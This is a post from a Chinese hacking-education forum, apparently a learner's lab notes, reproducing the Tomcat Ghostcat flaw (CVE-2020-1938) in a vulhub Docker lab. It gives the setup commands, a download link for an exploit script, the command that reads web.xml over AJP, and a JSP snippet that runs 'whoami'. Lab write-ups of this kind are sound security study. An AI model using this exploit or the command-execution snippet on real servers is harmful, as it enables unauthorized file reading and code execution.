设为首页
收藏本站
开启辅助访问
切换到宽版
用户名
Email
自动登录
找回密码
密码
登录
立即注册
只需一步,快速开始
快捷导航
女黑客
BBS
CTF挑战赛
大纲下载
黑客靶场
sqlilab靶场
dvwa靶场
网安教育
搜索
搜索
热搜:
没有网络安全,就没有国家安全
本版
帖子
用户
女黑客
»
女黑客
›
渗透测试学习
›
【 学 习 笔 记 】
›
幽灵猫 CVE-2020-1938 实验
返回列表
幽灵猫 CVE-2020-1938 实验
[复制链接]
发表于 2023-2-1 22:20:25
|
显示全部楼层
|
阅读模式
首先搭建好vulhub靶场
进入 /vulhub-master/tomcat/CVE-2020-1938
执行命令:
sudo docker-compose up -d
复制代码
再执行命令 查看运行的容器
sudo docker ps
复制代码
下载幽灵猫利用程序:
链接:
https://pan.baidu.com/s/16_QLyemn6lQSt_yhRnOOLg?pwd=iylb
提取码:iylb
进入程序执行命令:
python2 ./CNVD-2020-10487-Tomcat-Ajp-lfi.py 192.168.100.10 -p 8009 -f /WEB-INF/web.xml
复制代码
手动进入靶机里
创建文件2.txt,代码如下
<%out.println(new java.io.BufferedReader(new java.io.InputStreamReader(Runtime.getRuntime().exec("whoami").getInputStream())).readLine());%>
复制代码
这个whoami并没有执行,说明这个漏洞只能读取文件,并不能文件包含。
回复
使用道具
举报
返回列表
高级模式
B
Color
Image
Link
Quote
Code
Smilies
您需要登录后才可以回帖
登录
|
立即注册
本版积分规则
发表回复
回帖后跳转到最后一页
');
|
Archiver
|
手机版
|
小黑屋
|
女黑客
© Copyright 2021 版权所有(一极教育科技有限公司)
津ICP备17008032号-3
快速回复
返回顶部
返回列表